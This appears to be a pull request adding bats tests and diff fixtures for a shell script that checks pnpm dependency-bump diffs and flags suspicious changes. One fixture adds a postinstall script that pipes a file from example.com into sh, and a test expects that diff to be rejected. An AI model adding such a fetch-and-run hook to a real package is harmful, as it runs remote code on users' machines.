+--- /dev/null
++++ b/pnpm-lock.yaml
+@@ -0,0 +1,8 @@
++lockfileVersion: '9.0'
++
++importers:
++
++  .:
++    dependencies:
++      lodash:
++        specifier: ^4.17.21

--- a/tests/fixtures/npm-bump-extract/lock-overrides.diff
+++ b/tests/fixtures/npm-bump-extract/lock-overrides.diff
@@ -1,0 +1,8 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -8,3 +8,3 @@ overrides:
+   semver: ^7.5.2
+-  minimist: ^1.2.6
++  minimist: ^1.2.8

--- a/tests/fixtures/npm-bump-extract/lock-packages-added.diff
+++ b/tests/fixtures/npm-bump-extract/lock-packages-added.diff
@@ -1,0 +1,15 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -449,8 +449,8 @@ packages:
+-  '@commitlint/cli@20.5.0':
+-    resolution: {integrity: sha512-AAAA==}
++  '@commitlint/cli@21.0.2':
++    resolution: {integrity: sha512-BBBB==}
++
++  terser@5.48.0:
++    resolution: {integrity: sha512-CCCC==}
+@@ -900,3 +900,3 @@ snapshots:
+-  '@commitlint/cli@20.5.0': {}
++  '@commitlint/cli@21.0.2': {}

--- a/tests/fixtures/npm-bump-extract/lock-peer-suffix-only.diff
+++ b/tests/fixtures/npm-bump-extract/lock-peer-suffix-only.diff
@@ -1,0 +1,9 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -61,7 +61,7 @@ importers:
+       '@sentry/nextjs':
+         specifier: ^10.32.1
+-        version: 10.38.0(react@19.2.3)(webpack@5.104.1)
++        version: 10.38.0(react@19.2.3)(webpack@5.104.1(lightningcss@1.32.0))

--- a/tests/fixtures/npm-bump-extract/lock-pnpmfile-checksum.diff
+++ b/tests/fixtures/npm-bump-extract/lock-pnpmfile-checksum.diff
@@ -1,0 +1,7 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -5,2 +5,2 @@ pnpmfileChecksum:
+-pnpmfileChecksum: sha256-AAAA
++pnpmfileChecksum: sha256-BBBB

--- a/tests/fixtures/npm-bump-extract/lock-settings-change.diff
+++ b/tests/fixtures/npm-bump-extract/lock-settings-change.diff
@@ -1,0 +1,8 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -104,3 +104,3 @@ settings:
+   autoInstallPeers: true
+-  excludeLinksFromLockfile: false
++  excludeLinksFromLockfile: true

--- a/tests/fixtures/npm-bump-extract/lock-simple-bump.diff
+++ b/tests/fixtures/npm-bump-extract/lock-simple-bump.diff
@@ -1,0 +1,16 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -199,11 +199,11 @@ importers:
+     devDependencies:
+       '@commitlint/cli':
+-        specifier: ^20.5.0
+-        version: 20.5.0(@types/node@22.19.9)(typescript@5.9.3)
++        specifier: ^21.0.2
++        version: 21.0.2(@types/node@22.19.9)(typescript@5.9.3)
+       '@commitlint/config-conventional':
+-        specifier: ^20.5.0
+-        version: 20.5.0
++        specifier: ^21.0.2
++        version: 21.0.2

--- a/tests/fixtures/npm-bump-extract/lock-specifier-only.diff
+++ b/tests/fixtures/npm-bump-extract/lock-specifier-only.diff
@@ -1,0 +1,10 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -199,4 +199,4 @@ importers:
+     dependencies:
+       foo:
+-        specifier: ^1.0.0
++        specifier: ^1.0.1
+         version: 1.0.5

--- a/tests/fixtures/npm-bump-extract/lock-two-versions.diff
+++ b/tests/fixtures/npm-bump-extract/lock-two-versions.diff
@@ -1,0 +1,20 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -20,5 +20,5 @@ importers:
+   apps/web:
+     dependencies:
+       lodash:
+-        specifier: ^4.17.20
+-        version: 4.17.20
++        specifier: ^4.17.21
++        version: 4.17.21
+@@ -60,5 +60,5 @@ importers:
+   apps/api:
+     dependencies:
+       lodash:
+-        specifier: ^5.0.0
+-        version: 5.0.0
++        specifier: ^5.0.1
++        version: 5.0.1

--- a/tests/fixtures/npm-bump-extract/lock-unknown-section.diff
+++ b/tests/fixtures/npm-bump-extract/lock-unknown-section.diff
@@ -1,0 +1,8 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -40,3 +40,3 @@ futureSection:
+   thing:
+-    value: 1
++    value: 2

--- a/tests/fixtures/npm-bump-extract/lock-version-bump.diff
+++ b/tests/fixtures/npm-bump-extract/lock-version-bump.diff
@@ -1,0 +1,9 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -1,3 +1,3 @@ lockfileVersion:
+-lockfileVersion: '9.0'
++lockfileVersion: '10.0'
+ 
+ importers:

--- a/tests/fixtures/npm-bump-extract/manifest-added-dep.diff
+++ b/tests/fixtures/npm-bump-extract/manifest-added-dep.diff
@@ -1,0 +1,18 @@
+diff --git a/package.json b/package.json
+index 1111111..2222222 100644
+--- a/package.json
++++ b/package.json
+@@ -168,3 +168,4 @@
+   "devDependencies": {
++    "brand-new-pkg": "^1.0.0",
+     "typescript": "^5.9.3"
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 3333333..4444444 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -199,3 +199,6 @@ importers:
+     devDependencies:
++      brand-new-pkg:
++        specifier: ^1.0.0
++        version: 1.0.0
+       typescript:

--- a/tests/fixtures/npm-bump-extract/manifest-and-lock-clean.diff
+++ b/tests/fixtures/npm-bump-extract/manifest-and-lock-clean.diff
@@ -1,0 +1,20 @@
+diff --git a/package.json b/package.json
+index 1111111..2222222 100644
+--- a/package.json
++++ b/package.json
+@@ -168,4 +168,4 @@
+   "devDependencies": {
+-    "@commitlint/cli": "^20.5.0",
++    "@commitlint/cli": "^21.0.2",
+     "typescript": "^5.9.3"
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 3333333..4444444 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -199,5 +199,5 @@ importers:
+     devDependencies:
+       '@commitlint/cli':
+-        specifier: ^20.5.0
+-        version: 20.5.0
++        specifier: ^21.0.2
++        version: 21.0.2

--- a/tests/fixtures/npm-bump-extract/manifest-exotic-ranges.diff
+++ b/tests/fixtures/npm-bump-extract/manifest-exotic-ranges.diff
@@ -1,0 +1,41 @@
+diff --git a/package.json b/package.json
+index 1111111..2222222 100644
+--- a/package.json
++++ b/package.json
+@@ -10,8 +10,8 @@
+   "devDependencies": {
+-    "esbuild": "^0.27.0 || ^0.28.0",
+-    "jiti": "*",
+-    "legacy-thing": "1.x",
+-    "ranged": ">=1.0.0 <2.0.0",
++    "esbuild": "^0.28.0 || ^0.29.0",
++    "jiti": "*",
++    "legacy-thing": "2.x",
++    "ranged": ">=1.1.0 <2.0.0",
+     "typescript": "^5.9.3"
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 3333333..4444444 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -199,12 +199,12 @@ importers:
+     devDependencies:
+       esbuild:
+-        specifier: ^0.27.0 || ^0.28.0
+-        version: 0.27.1
++        specifier: ^0.28.0 || ^0.29.0
++        version: 0.28.2
+       jiti:
+-        specifier: '*'
+-        version: 2.6.1
++        specifier: '*'
++        version: 2.7.0
+       legacy-thing:
+-        specifier: 1.x
+-        version: 1.9.0
++        specifier: 2.x
++        version: 2.1.0
+       ranged:
+-        specifier: '>=1.0.0 <2.0.0'
+-        version: 1.0.4
++        specifier: '>=1.1.0 <2.0.0'
++        version: 1.1.2

--- a/tests/fixtures/npm-bump-extract/manifest-package-manager.diff
+++ b/tests/fixtures/npm-bump-extract/manifest-package-manager.diff
@@ -1,0 +1,9 @@
+diff --git a/package.json b/package.json
+index 1111111..2222222 100644
+--- a/package.json
++++ b/package.json
+@@ -2,3 +2,3 @@
+   "name": "demo",
+-  "packageManager": "pnpm@10.34.5",
++  "packageManager": "pnpm@11.20.0",
+   "devDependencies": {

--- a/tests/fixtures/npm-bump-extract/manifest-postinstall.diff
+++ b/tests/fixtures/npm-bump-extract/manifest-postinstall.diff
@@ -1,0 +1,22 @@
+diff --git a/package.json b/package.json
+index 1111111..2222222 100644
+--- a/package.json
++++ b/package.json
+@@ -168,5 +168,6 @@
+   "devDependencies": {
+-    "@commitlint/cli": "^20.5.0",
++    "@commitlint/cli": "^21.0.2",
+     "typescript": "^5.9.3"
+   },
++    "postinstall": "curl https://example.com/x.sh | sh",
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 3333333..4444444 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -199,5 +199,5 @@ importers:
+     devDependencies:
+       '@commitlint/cli':
+-        specifier: ^20.5.0
+-        version: 20.5.0
++        specifier: ^21.0.2
++        version: 21.0.2

--- a/tests/fixtures/npm-bump-extract/manifest-removed-dep.diff
+++ b/tests/fixtures/npm-bump-extract/manifest-removed-dep.diff
@@ -1,0 +1,18 @@
+diff --git a/package.json b/package.json
+index 1111111..2222222 100644
+--- a/package.json
++++ b/package.json
+@@ -168,4 +168,3 @@
+   "devDependencies": {
+-    "left-pad": "^1.3.0",
+     "typescript": "^5.9.3"
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 3333333..4444444 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -199,6 +199,3 @@ importers:
+     devDependencies:
+-      left-pad:
+-        specifier: ^1.3.0
+-        version: 1.3.0
+       typescript:

--- a/tests/fixtures/npm-bump-extract/manifest-uncorroborated.diff
+++ b/tests/fixtures/npm-bump-extract/manifest-uncorroborated.diff
@@ -1,0 +1,20 @@
+diff --git a/package.json b/package.json
+index 1111111..2222222 100644
+--- a/package.json
++++ b/package.json
+@@ -168,4 +168,4 @@
+   "devDependencies": {
+-    "left-pad": "^1.0.0",
++    "left-pad": "^1.3.0",
+     "typescript": "^5.9.3"
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 3333333..4444444 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -199,5 +199,5 @@ importers:
+     devDependencies:
+       '@commitlint/cli':
+-        specifier: ^20.5.0
+-        version: 20.5.0
++        specifier: ^21.0.2
++        version: 21.0.2

--- a/tests/fixtures/npm-bump-extract/manifest-without-lock.diff
+++ b/tests/fixtures/npm-bump-extract/manifest-without-lock.diff
@@ -1,0 +1,9 @@
+diff --git a/package.json b/package.json
+index 1111111..2222222 100644
+--- a/package.json
++++ b/package.json
+@@ -168,4 +168,4 @@
+   "devDependencies": {
+-    "@commitlint/cli": "^20.5.0",
++    "@commitlint/cli": "^21.0.2",
+     "typescript": "^5.9.3"

--- a/tests/fixtures/npm-bump-extract/real-grouped-monorepo.diff
+++ b/tests/fixtures/npm-bump-extract/real-grouped-monorepo.diff
@@ -1,0 +1,40 @@
+diff --git a/apps/desktop/package.json b/apps/desktop/package.json
+index 1111111..2222222 100644
+--- a/apps/desktop/package.json
++++ b/apps/desktop/package.json
+@@ -32,3 +32,3 @@
+     "framer-motion": "^12.43.0",
+-    "lucide-react": "^1.27.0",
++    "lucide-react": "^1.28.0",
+     "monaco-editor": "^0.56.0",
+diff --git a/package.json b/package.json
+index 3333333..4444444 100644
+--- a/package.json
++++ b/package.json
+@@ -22,3 +22,3 @@
+   "devDependencies": {
+     "@vitest/coverage-v8": "^4",
+-    "turbo": "^2.10.7"
++    "turbo": "^2.10.8"
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 5555555..6666666 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -20,9 +20,9 @@ importers:
+     dependencies:
+       lucide-react:
+-        specifier: ^1.27.0
+-        version: 1.27.0(react@19.2.8)
++        specifier: ^1.28.0
++        version: 1.28.0(react@19.2.8)
+     devDependencies:
+       turbo:
+-        specifier: ^2.10.7
+-        version: 2.10.7
++        specifier: ^2.10.8
++        version: 2.10.8
+@@ -300,4 +300,4 @@ packages:
+-  lucide-react@1.27.0:
+-    resolution: {integrity: sha512-AAAA==}
++  lucide-react@1.28.0:
++    resolution: {integrity: sha512-BBBB==}

--- a/tests/fixtures/npm-bump-extract/real-lockfile-only.diff
+++ b/tests/fixtures/npm-bump-extract/real-lockfile-only.diff
@@ -1,0 +1,9 @@
+diff --git a/pnpm-lock.yaml b/pnpm-lock.yaml
+index 1111111..2222222 100644
+--- a/pnpm-lock.yaml
++++ b/pnpm-lock.yaml
+@@ -400,4 +400,4 @@ packages:
+-  minimist@1.2.5:
+-    resolution: {integrity: sha512-AAAA==}
++  minimist@1.2.8:
++    resolution: {integrity: sha512-BBBB==}

--- a/tests/fixtures/npm-bump-extract/unrelated-file.diff
+++ b/tests/fixtures/npm-bump-extract/unrelated-file.diff
@@ -1,0 +1,8 @@
+diff --git a/README.md b/README.md
+index 1111111..2222222 100644
+--- a/README.md
++++ b/README.md
+@@ -1,3 +1,3 @@
+ # Title
+-old line
++new line

--- a/tests/npm-bump-extract.bats
+++ b/tests/npm-bump-extract.bats
@@ -147,3 +147,15 @@ assert_disqualified() {
   [ "$status" -eq 0 ]
   [ "$output" = "$(printf 'lodash\t4.17.21\tnpm\nlodash\t5.0.1\tnpm')" ]
 }
+
+@test "tier-2 collects newly added packages entries, skipping snapshots" {
+  run_fixture lockfile-entries tests/fixtures/npm-bump-extract/lock-packages-added.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf '@commitlint/cli\t21.0.2\tnpm\nterser\t5.48.0\tnpm')" ]
+}
+
+@test "tier-2 does not leak into tier-1 output" {
+  run_fixture deps tests/fixtures/npm-bump-extract/lock-packages-added.diff
+  [ "$status" -eq 0 ]
+  [ -z "$output" ]
+}

--- a/tests/npm-bump-extract.bats
+++ b/tests/npm-bump-extract.bats
@@ -57,3 +57,51 @@ run_fixture() {
     [ -z "$output" ]
   done
 }
+
+# Helper: asserts a fixture is fully disqualified. All three modes must emit
+# zero rows on STDOUT. Checking only --mode=deps cannot distinguish a
+# disqualified file from a clean file with nothing to extract — only
+# cleared-paths differs.
+#
+# `--separate-stderr` is required, not cosmetic. Plain `run` merges stderr into
+# $output, and disqualify_lock writes its reason to stderr — so `[ -z "$output" ]`
+# under plain `run` can never pass for a fixture that genuinely disqualifies.
+# The diagnostic is required behaviour (it is how the workflow explains a red
+# gate), so the assertion must scope to stdout rather than the diagnostic being
+# suppressed. Verified on bats 1.14.0; --separate-stderr exists since 1.5.0.
+assert_disqualified() {
+  local fixture="$1"
+  for mode in deps lockfile-entries cleared-paths; do
+    run --separate-stderr bash scripts/npm-bump-extract.sh "--mode=$mode" < "$fixture"
+    [ "$status" -eq 0 ]
+    [ -z "$output" ]
+  done
+}
+
+@test "lockfile overrides: change disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/lock-overrides.diff
+}
+
+@test "lockfile pnpmfileChecksum change disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/lock-pnpmfile-checksum.diff
+}
+
+@test "unrecognized lockfile section disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/lock-unknown-section.diff
+}
+
+@test "hunk crossing from catalogs into overrides disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/lock-cross-section.diff
+}
+
+@test "integrity change for an unchanged version disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/lock-integrity-only.diff
+}
+
+@test "settings change disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/lock-settings-change.diff
+}
+
+@test "newly created lockfile disqualifies (no section context)" {
+  assert_disqualified tests/fixtures/npm-bump-extract/lock-new-file.diff
+}

--- a/tests/npm-bump-extract.bats
+++ b/tests/npm-bump-extract.bats
@@ -49,3 +49,11 @@ run_fixture() {
   [ "$status" -eq 2 ]
   [[ "$output" == *"unknown argument"* ]]
 }
+
+@test "diff with no npm files emits nothing in every mode" {
+  for mode in deps lockfile-entries cleared-paths; do
+    run_fixture "$mode" tests/fixtures/npm-bump-extract/unrelated-file.diff
+    [ "$status" -eq 0 ]
+    [ -z "$output" ]
+  done
+}

--- a/tests/npm-bump-extract.bats
+++ b/tests/npm-bump-extract.bats
@@ -106,3 +106,11 @@ assert_disqualified() {
 @test "newly created lockfile disqualifies (no section context)" {
   assert_disqualified tests/fixtures/npm-bump-extract/lock-new-file.diff
 }
+
+@test "unsupported lockfileVersion disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/lock-version-bump.diff
+}
+
+@test "multi-document lockfile disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/lock-multidoc.diff
+}

--- a/tests/npm-bump-extract.bats
+++ b/tests/npm-bump-extract.bats
@@ -159,3 +159,42 @@ assert_disqualified() {
   [ "$status" -eq 0 ]
   [ -z "$output" ]
 }
+
+@test "clean manifest plus lock clears both paths and emits the row" {
+  run_fixture deps tests/fixtures/npm-bump-extract/manifest-and-lock-clean.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf '@commitlint/cli\t21.0.2\tnpm')" ]
+  run_fixture cleared-paths tests/fixtures/npm-bump-extract/manifest-and-lock-clean.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf 'package.json\npnpm-lock.yaml')" ]
+}
+
+@test "lifecycle script in manifest disqualifies everything" {
+  assert_disqualified tests/fixtures/npm-bump-extract/manifest-postinstall.diff
+}
+
+@test "manifest dep with no matching lock entry disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/manifest-uncorroborated.diff
+}
+
+@test "manifest without a lockfile disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/manifest-without-lock.diff
+}
+
+@test "packageManager-only change disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/manifest-package-manager.diff
+}
+
+@test "dependency added without replacement disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/manifest-added-dep.diff
+}
+
+@test "dependency removed without replacement disqualifies" {
+  assert_disqualified tests/fixtures/npm-bump-extract/manifest-removed-dep.diff
+}
+
+@test "wildcard and union ranges are accepted, not rejected" {
+  run_fixture cleared-paths tests/fixtures/npm-bump-extract/manifest-exotic-ranges.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf 'package.json\npnpm-lock.yaml')" ]
+}

--- a/tests/npm-bump-extract.bats
+++ b/tests/npm-bump-extract.bats
@@ -114,3 +114,36 @@ assert_disqualified() {
 @test "multi-document lockfile disqualifies" {
   assert_disqualified tests/fixtures/npm-bump-extract/lock-multidoc.diff
 }
+
+@test "importers bump emits one tier-1 row per changed base version" {
+  run_fixture deps tests/fixtures/npm-bump-extract/lock-simple-bump.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf '@commitlint/cli\t21.0.2\tnpm\n@commitlint/config-conventional\t21.0.2\tnpm')" ]
+}
+
+@test "peer-suffix-only change emits no tier-1 row" {
+  run_fixture deps tests/fixtures/npm-bump-extract/lock-peer-suffix-only.diff
+  [ "$status" -eq 0 ]
+  [ -z "$output" ]
+}
+
+@test "catalogs bump emits a tier-1 row" {
+  run_fixture deps tests/fixtures/npm-bump-extract/lock-catalog-bump.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf '@babel/core\t7.29.7\tnpm')" ]
+}
+
+@test "specifier-only change emits no row and does not disqualify" {
+  run_fixture deps tests/fixtures/npm-bump-extract/lock-specifier-only.diff
+  [ "$status" -eq 0 ]
+  [ -z "$output" ]
+  run_fixture cleared-paths tests/fixtures/npm-bump-extract/lock-specifier-only.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "pnpm-lock.yaml" ]
+}
+
+@test "same package at two versions in two importers yields two rows" {
+  run_fixture deps tests/fixtures/npm-bump-extract/lock-two-versions.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf 'lodash\t4.17.21\tnpm\nlodash\t5.0.1\tnpm')" ]
+}

--- a/tests/npm-bump-extract.bats
+++ b/tests/npm-bump-extract.bats
@@ -1,3 +1,4 @@
+bats_require_minimum_version 1.5.0
 #!/usr/bin/env bats
 
 # Helper: run the extractor in one mode against a here-string diff.

--- a/tests/npm-bump-extract.bats
+++ b/tests/npm-bump-extract.bats
@@ -198,3 +198,35 @@ assert_disqualified() {
   [ "$status" -eq 0 ]
   [ "$output" = "$(printf 'package.json\npnpm-lock.yaml')" ]
 }
+
+@test "grouped monorepo: rows from lock, all paths cleared" {
+  run_fixture deps tests/fixtures/npm-bump-extract/real-grouped-monorepo.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf 'lucide-react\t1.28.0\tnpm\nturbo\t2.10.8\tnpm')" ]
+
+  run_fixture cleared-paths tests/fixtures/npm-bump-extract/real-grouped-monorepo.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf 'apps/desktop/package.json\npackage.json\npnpm-lock.yaml')" ]
+}
+
+@test "grouped monorepo: bare-major range does not become a version" {
+  # "@vitest/coverage-v8": "^4" is a context line here. This asserts no row
+  # ever carries a bare major as its version.
+  run_fixture deps tests/fixtures/npm-bump-extract/real-grouped-monorepo.diff
+  [ "$status" -eq 0 ]
+  ! [[ "$output" =~ $'\t'4$'\t' ]]
+}
+
+@test "lockfile-only security update: zero tier-1 rows, tier-2 swept, path cleared" {
+  run_fixture deps tests/fixtures/npm-bump-extract/real-lockfile-only.diff
+  [ "$status" -eq 0 ]
+  [ -z "$output" ]
+
+  run_fixture lockfile-entries tests/fixtures/npm-bump-extract/real-lockfile-only.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "$(printf 'minimist\t1.2.8\tnpm')" ]
+
+  run_fixture cleared-paths tests/fixtures/npm-bump-extract/real-lockfile-only.diff
+  [ "$status" -eq 0 ]
+  [ "$output" = "pnpm-lock.yaml" ]
+}

--- a/tests/npm-bump-extract.bats
+++ b/tests/npm-bump-extract.bats
@@ -1,0 +1,51 @@
+#!/usr/bin/env bats
+
+# Helper: run the extractor in one mode against a here-string diff.
+run_mode() {
+  local mode="$1" diff="$2"
+  run bash -c "bash scripts/npm-bump-extract.sh --mode=$mode" <<< "$diff"
+}
+
+# Helper: run the extractor in one mode against a fixture file.
+run_fixture() {
+  local mode="$1" fixture="$2"
+  run bash scripts/npm-bump-extract.sh "--mode=$mode" < "$fixture"
+}
+
+@test "empty input exits 0 with no output in every mode" {
+  for mode in deps lockfile-entries cleared-paths; do
+    run bash -c "bash scripts/npm-bump-extract.sh --mode=$mode" < /dev/null
+    [ "$status" -eq 0 ]
+    [ -z "$output" ]
+  done
+}
+
+@test "non-diff input exits 2" {
+  run_mode deps "this is not a diff"
+  [ "$status" -eq 2 ]
+  [[ "$output" == *"not a unified diff"* ]]
+}
+
+@test "missing --mode exits 2" {
+  run bash -c 'bash scripts/npm-bump-extract.sh' < /dev/null
+  [ "$status" -eq 2 ]
+  [[ "$output" == *"--mode="* ]]
+}
+
+@test "repeated --mode exits 2" {
+  run bash -c 'bash scripts/npm-bump-extract.sh --mode=deps --mode=deps' < /dev/null
+  [ "$status" -eq 2 ]
+  [[ "$output" == *"more than once"* ]]
+}
+
+@test "unknown argument exits 2" {
+  run bash -c 'bash scripts/npm-bump-extract.sh --mode=deps --bogus' < /dev/null
+  [ "$status" -eq 2 ]
+  [[ "$output" == *"unknown argument"* ]]
+}
+
+@test "unknown mode value exits 2" {
+  run bash -c 'bash scripts/npm-bump-extract.sh --mode=nonsense' < /dev/null
+  [ "$status" -eq 2 ]
+  [[ "$output" == *"unknown argument"* ]]
+}


### PR DESCRIPTION
Adds `scripts/npm-bump-extract.sh`, the diff-aware extractor for
`package.json` + `pnpm-lock.yaml`. Inert in this PR — nothing calls it and
there is no `INLINE_PAIRS` entry, so `check-inline-sync.sh` stays satisfied.

Three modes: `--mode=deps` (tier-1 declared dependency rows),
`--mode=lockfile-entries` (tier-2 newly introduced versions), and
`--mode=cleared-paths`.

Design: `docs/superpowers/specs/2026-08-04-npm-pnpm-dependency-safety-design.md`

Part 1 of 3 PRs. Refs #127.
